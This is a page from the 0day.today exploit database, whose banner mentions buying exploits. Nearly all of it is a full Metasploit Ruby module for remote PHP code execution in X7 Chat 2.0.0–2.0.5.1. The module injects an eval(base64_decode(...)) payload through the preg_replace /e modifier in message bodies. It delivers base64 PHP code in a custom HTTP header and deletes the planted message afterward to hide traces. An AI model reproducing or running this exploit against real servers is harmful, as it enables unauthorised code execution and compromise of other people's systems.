0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution Exploit

Author

metasploit

Risk

[

Security Risk Critical

]

0day-ID

Category

Date add

Platform

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution',
      'Description'    => %q{
        This module exploits a post-auth vulnerability found in X7 Chat versions
        2.0.0  up to 2.0.5.1. The vulnerable code exists on lib/message.php, which
        uses preg_replace() function with the /e modifier. This allows a remote
        authenticated attacker to execute arbitrary PHP code in the remote machine.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Fernando Munoz <fernando[at]null-life.com>', # discovery & module development
          'Juan Escobar <eng.jescobar[at]gmail.com>', # module development @itsecurityco
        ],
      'References'     =>
        [
          # Using this URL because isn't nothing else atm
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/4076']
        ],
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Generic (PHP Payload)', {}]],
      'DisclosureDate' => 'Oct 27 2014',
      'DefaultTarget'  => 0))

      register_options(
      [
        OptString.new('USERNAME', [ true, 'Username to authenticate as', '']),
        OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', '']),
        OptString.new('TARGETURI', [ true, 'Base x7 Chat directory path', '/x7chat2']),
      ], self.class)
  end

  def check
    res = exec_php('phpinfo(); die();', true)

    if res && res.body =~ /This program makes use of the Zend/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Unknown
    end
  end

  def exec_php(php_code, is_check = false)

    # remove comments, line breaks and spaces of php_code
    payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')

    # clean b64 payload (we can not use quotes or apostrophes and b64 string must not contain equals)
    while Rex::Text.encode_base64(payload_clean) =~ /=/
      payload_clean = "#{ payload_clean } "
    end
    payload_b64 = Rex::Text.encode_base64(payload_clean)

    cookie_x7c2u = "X7C2U=#{ datastore['USERNAME'] }"
    cookie_x7c2p = "X7C2P=#{ Rex::Text.md5(datastore['PASSWORD']) }"
    rand_text = Rex::Text.rand_text_alpha_upper(5, 8)

    print_status("Trying for version 2.0.2 up to 2.0.5.1")
    print_status("Sending offline message (#{ rand_text }) to #{ datastore['USERNAME'] }...")
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'index.php'),
      'headers'  => {
        'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
      },
      'vars_get' => {
        # value compatible with 2.0.2 up to 2.0.5.1
        'act'     => 'user_cp',
        'cp_page' => 'msgcenter',
        'to'      => datastore['USERNAME'],
        'subject' => rand_text,
        'body'    => "#{ rand_text }www.{${eval(base64_decode($_SERVER[HTTP_#{ rand_text }]))}}.c#{ rand_text }",
      }
    })

    unless res && res.code == 200
      print_error("Sending the message (#{ rand_text }) has failed")
      return false
    end

    if res.body =~ /([0-9]*)">#{ rand_text }/
      message_id = Regexp.last_match[1]
      user_panel = 'user_cp'
    else
      print_error("Could not find message (#{ rand_text }) in the message list")

      print_status("Retrying for version 2.0.0 up to 2.0.1 a1")
      print_status("Sending offline message (#{ rand_text }) to #{ datastore['USERNAME'] }...")
      res = send_request_cgi({
        'method'   => 'GET',
        'uri'      => normalize_uri(target_uri.path, 'index.php'),
        'headers'  => {
          'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
        },
        'vars_get' => {
          # value compatible with 2.0.0 up to 2.0.1 a1
          'act'     => 'usercp',
          'cp_page' => 'msgcenter',
          'to'      => datastore['USERNAME'],
          'subject' => rand_text,
          'body'    => "#{ rand_text }www.{${eval(base64_decode($_SERVER[HTTP_#{ rand_text }]))}}.c#{ rand_text }",
        }
      })

      unless res && res.code == 200
        print_error("Sending the message (#{ rand_text }) has failed")
        return false
      end

      if res.body =~ /([0-9]*)">#{ rand_text }/
        message_id = Regexp.last_match[1]
        user_panel = 'usercp'
      else
        print_error("Could not find message (#{ rand_text }) in the message list")
        return false
      end
    end

    print_status("Accessing message (#{ rand_text })")
    print_status("Sending payload in HTTP header '#{ rand_text }'")

    if is_check
      timeout = 20
    else
      timeout = 3
    end

    res = send_request_cgi({
      'method'    => 'GET',
      'uri'       => normalize_uri(target_uri.path, 'index.php'),
      'headers'   => {
        'Cookie'  => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
        rand_text => payload_b64,
      },
      'vars_get'  => {
        'act'     => user_panel,
        'cp_page' => 'msgcenter',
        'read'    => message_id,
      }
    }, timeout)

    res_payload = res

    print_status("Deleting message (#{ rand_text })")
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'index.php'),
      'headers'  => {
        'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
      },
      'vars_get' => {
        'act'     => user_panel,
        'cp_page' => 'msgcenter',
        'delete'  => message_id,
      }
    })

    if res && res.body =~ /The message has been deleted/
      print_good("Message (#{ rand_text }) removed")
    else
      print_error("Removing message (#{ rand_text }) has failed")
      return false
    end

    # if check return the response
    if is_check
      return res_payload
    else
      return true
    end
  end

  def exploit
    unless exec_php(payload.encoded)
      fail_with(Failure::Unknown, "#{peer} - Exploit failed, aborting.")
    end
  end
end

#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution Exploit

Report Error

Report Error